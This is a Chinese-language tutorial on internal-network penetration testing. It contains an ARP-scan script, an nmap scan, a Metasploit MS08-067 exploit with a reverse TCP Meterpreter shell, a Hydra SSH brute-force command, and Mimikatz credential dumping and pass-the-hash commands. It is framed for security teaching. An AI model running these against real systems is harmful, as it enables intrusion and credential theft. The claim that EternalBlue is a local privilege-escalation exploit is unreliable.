内网渗透基础（一）：从信息收集到权限提升的实战指南

引言

内网渗透测试是网络安全领域中一项复杂且高风险的技术活动，其核心在于通过模拟攻击者的视角，发现并利用内网环境中的安全漏洞，进而评估系统的防护能力。本文作为“内网渗透基础”系列的第一篇，将重点介绍内网渗透的初步阶段，包括信息收集、漏洞扫描、弱口令检测及权限提升等关键环节，为后续深入渗透打下坚实基础。

一、信息收集：内网渗透的第一步

1.1 网络拓扑探测

内网渗透的首要任务是了解目标网络的拓扑结构，包括子网划分、IP地址范围、关键设备位置等。这可以通过以下方式实现：

• ARP扫描：利用ARP协议请求获取局域网内活跃主机的MAC地址与IP对应关系。
• ICMP Ping扫描：发送ICMP Echo请求探测目标主机是否在线。
• SNMP查询：若目标网络启用了SNMP服务，可通过查询MIB库获取网络设备信息。

示例代码（Python）：

import scapy.all as scapy
def arp_scan(subnet):
    arp_request = scapy.ARP(pdst=subnet)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
    print("IP\t\t\tMAC Address")
    for element in answered_list:
        print(element[1].psrc + "\t\t" + element[1].hwsrc)
arp_scan("192.168.1.0/24")

1.2 主机信息收集

获取到活跃主机列表后，需进一步收集每台主机的详细信息，如操作系统类型、开放端口、运行服务等。这通常通过端口扫描和服务识别工具实现，如Nmap。

Nmap命令示例：

nmap -sS -O -p 1-65535 192.168.1.100

• -sS：TCP SYN扫描，隐蔽性较好。
• -O：启用操作系统检测。
• -p 1-65535：扫描所有端口。

二、漏洞扫描：发现潜在攻击入口

2.1 自动化漏洞扫描

利用自动化工具如Nessus、OpenVAS等，对目标主机进行全面的漏洞扫描，识别已知的安全漏洞。这些工具通常包含大量的漏洞检查插件，能够覆盖操作系统、应用程序、网络设备等多个层面。

2.2 手动验证与利用

自动化扫描结果可能包含误报，因此需进行手动验证。对于确认存在的漏洞，可进一步研究其利用方式，如通过Metasploit框架编写或使用现有的漏洞利用模块。

Metasploit示例：

use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1
exploit

此示例利用MS08-067漏洞攻击Windows系统，并尝试建立反向TCP连接。

三、弱口令检测：破解内网门户

3.1 常见弱口令字典

弱口令是内网渗透中常见的突破口。攻击者常使用包含常见密码、生日、姓名组合等的字典文件进行暴力破解。

3.2 暴力破解工具

Hydra、Medusa等工具支持多协议、多线程的暴力破解，可针对SSH、RDP、FTP等服务进行口令猜测。

Hydra命令示例：

hydra -l admin -P /path/to/password.txt 192.168.1.100 ssh

此命令尝试使用password.txt字典文件中的密码，以admin用户身份登录SSH服务。

四、权限提升：从普通用户到系统管理员

4.1 本地权限提升

利用系统漏洞或配置错误，从普通用户权限提升至管理员权限。常见方法包括：

• 提权漏洞利用：如Windows下的EternalBlue、Linux下的Dirty Cow等。
• 配置错误利用：如SUID/SGID文件滥用、计划任务劫持等。

4.2 横向移动

获得管理员权限后，可进一步在内网中横向移动，寻找其他高价值目标。这通常通过以下方式实现：

• Pass the Hash：利用哈希值代替明文密码进行身份验证。
• 票据传递攻击：如Kerberos票据传递，无需知道用户密码即可访问资源。

Mimikatz示例（Pass the Hash）：

# 在已提权的机器上执行
sekurlsa::logonpasswords  # 提取当前登录用户的哈希值
# 假设获取到管理员的NTLM哈希
privilege::debug
sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<NTLM_HASH> /run:cmd.exe

此示例使用Mimikatz提取并利用管理员的NTLM哈希值，以管理员身份运行CMD。

五、总结与展望

内网渗透是一个系统而复杂的过程，需要渗透测试人员具备扎实的网络安全基础、丰富的实战经验以及持续学习的能力。本文介绍了内网渗透的基础知识，包括信息收集、漏洞扫描、弱口令检测及权限提升等关键环节。然而，真正的内网渗透远不止于此，后续还将涉及更高级的技巧，如无文件攻击、域渗透等。

对于安全人员而言，掌握内网渗透技术不仅是为了应对潜在的安全威胁，更是为了提升自身的安全防护能力。通过模拟攻击者的视角，我们可以更全面地了解系统的薄弱环节，从而采取更加有效的防护措施。同时，也提醒广大企业用户，加强内网安全防护，定期进行安全审计和渗透测试，是保障业务连续性和数据安全的重要手段。